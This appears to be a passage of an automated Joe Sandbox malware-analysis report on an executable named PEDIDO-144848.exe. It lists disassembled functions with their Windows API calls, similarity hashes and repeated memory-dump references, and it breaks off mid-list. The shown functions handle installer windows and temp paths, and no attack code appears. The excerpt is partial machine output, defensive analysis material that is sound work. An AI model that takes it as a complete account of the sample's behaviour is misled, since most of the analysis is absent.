                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 2531174081-0
                                                        • Opcode ID: 8aca45e27811aa21f79b642ec133e9ff2e42e250cada4605035ec104fac27bf5
                                                        • Instruction ID: d1dd411a73e10bc413e7a6ba64919406d2bbbb657998d141ba589d50d7388124
                                                        • Opcode Fuzzy Hash: 8aca45e27811aa21f79b642ec133e9ff2e42e250cada4605035ec104fac27bf5
                                                        • Instruction Fuzzy Hash: 0D214C71900519AADF119FA5DD849DEBFA9EF09354F14807AF944A6290C7398D40CFA8
                                                        Function 00404884 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040489F
                                                        • GetMessagePos.USER32 ref: 004048A7
                                                        • ScreenToClient.USER32(?,?), ref: 004048C1
                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048D3
                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004048F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                        • Instruction ID: 53a3bc3e7d347c8b02fcccb5944648bd46d0fd351ff65b71f1969629af7e9ac2
                                                        • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                        • Instruction Fuzzy Hash: 12019275D00219BAEB00DBA5DC41BFEBBBCAF55711F10412BBA00B71D0C7B469018BA5
                                                        Function 00402749 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,00030000,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
                                                        • GlobalFree.KERNEL32(?), ref: 004027F2
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402805
                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: bd817bc7a5230683892e3683ec6d2df01fe810dda785156d5253b7aae5e8edff
                                                        • Instruction ID: ecef423f8b7fb5116dd0415946ee68b484c5f893cd0af9153c7a5222f957d578
                                                        • Opcode Fuzzy Hash: bd817bc7a5230683892e3683ec6d2df01fe810dda785156d5253b7aae5e8edff
                                                        • Instruction Fuzzy Hash: B921AE71C00128BBCF216FA5CE49D9E7E79EF09324F14423AF511762D0C6794D419FA9
                                                        Function 0040477A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404695,000000DF,00000000,00000400,?), ref: 00404818
                                                        • wsprintfA.USER32 ref: 00404820
                                                        • SetDlgItemTextA.USER32(?,0079E540), ref: 00404833
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s$@y
                                                        • API String ID: 3540041739-3020698753
                                                        • Opcode ID: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                        • Instruction ID: 9c2068d9445a5b6f252536eabbf1c91049bb0fb02782bdd1491d607ad1f2c465
                                                        • Opcode Fuzzy Hash: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                        • Instruction Fuzzy Hash: E711E773A041283BDB0065699C45EAF3698DB86334F254237FA25F31D1EA78CC1182E9
                                                        Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?), ref: 00401D3F
                                                        • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                        • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 978bdc3de84591c5b34c529a30ac5b154b9d899f544855d7d9a99db957ba7817
                                                        • Instruction ID: b8adc288744d91ba617009adb3e02bef21eb0d6e3f954176feac09388768b409
                                                        • Opcode Fuzzy Hash: 978bdc3de84591c5b34c529a30ac5b154b9d899f544855d7d9a99db957ba7817
                                                        • Instruction Fuzzy Hash: 45F0FFB2A04119BFE701EBA4DE88DAFB7BCEB44301B104466F601F2191C7749D018B79
                                                        Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: 182774ec21bf90fa89628062bdc31045ec8b3e2a1ef169624933301e1dab061d
                                                        • Instruction ID: 44e87a32571ed3235eb7b96b36fbe9a42cad9ebb5189372230b031547819aef2
                                                        • Opcode Fuzzy Hash: 182774ec21bf90fa89628062bdc31045ec8b3e2a1ef169624933301e1dab061d
                                                        • Instruction Fuzzy Hash: ED21A271E44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA788640DB28
                                                        Function 004039E5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowTextA.USER32(00000000,Rse Setup), ref: 00403A7D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: TextWindow
                                                        • String ID: "C:\Users\user\Desktop\PEDIDO-144848.exe"$1033$Rse Setup
                                                        • API String ID: 530164218-2961777182
                                                        • Opcode ID: 6c45f722f9a7ae4fb793d3ca626f1132432b1c01d3db27434527fc1e6ec0313f
                                                        • Instruction ID: 535a85070ebab7a8ba56d21747a6201fabbada84c5c70f31dda2a066eb9b82e2
                                                        • Opcode Fuzzy Hash: 6c45f722f9a7ae4fb793d3ca626f1132432b1c01d3db27434527fc1e6ec0313f
                                                        • Instruction Fuzzy Hash: D1110E35B002019FD7209F15DC80A377B6CEBCA355728823BE841A73A0D73D9D028BA8
                                                        Function 00405812 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040316D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405818
                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040316D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405821
                                                        • lstrcatA.KERNEL32(?,00409014), ref: 00405832
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405812
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-3355392842
                                                        • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                        • Instruction ID: 0a665bc2143073433464dc8fd220d9afc6aaff2f2e3703ee86bb110f897cf778
                                                        • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                        • Instruction Fuzzy Hash: DDD0A9A3606930AAE30222158C09EDF2A58CF12340B048037F200B22A2C63C8E418BFE
                                                        Function 004058AB Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,758B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                        • CharNextA.USER32(00000000), ref: 004058BE
                                                        • CharNextA.USER32(00000000), ref: 004058D2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CharNext
                                                        • String ID: C:\
                                                        • API String ID: 3213498283-3404278061
                                                        • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                        • Instruction ID: e63bfe958a3d000d539ac339b3831bddf0e80049928d73a3bf58654b49e63fc9
                                                        • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                        • Instruction Fuzzy Hash: 5CF0F653904F552AFB3272280C40B775B88DB5A361F14C077EE40B62C1D27C4C609FAA
                                                        Function 00402C96 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000,00402E76,?), ref: 00402CA9
                                                        • GetTickCount.KERNEL32 ref: 00402CC7
                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402CE4
                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402CF2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                        • String ID:
                                                        • API String ID: 2102729457-0
                                                        • Opcode ID: e47f6d303f75ebd17c716a95d6a18f35b6dc664df62f34b119683803831f88dc
                                                        • Instruction ID: 9ab3963fa07bdcc1a95f8d1ddaaeb6e773ff80e4731962a5f71ef67b0361f4de
                                                        • Opcode Fuzzy Hash: e47f6d303f75ebd17c716a95d6a18f35b6dc664df62f34b119683803831f88dc
                                                        • Instruction Fuzzy Hash: B9F03030809521AFD6125B24FF8EDDE7A64AB41701B114477F414B11E4D7781885CBD9
                                                        Function 00404F2D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00404F5C
                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 00404FAD
                                                          • Part of subcall function 00403FD1: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403FE3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
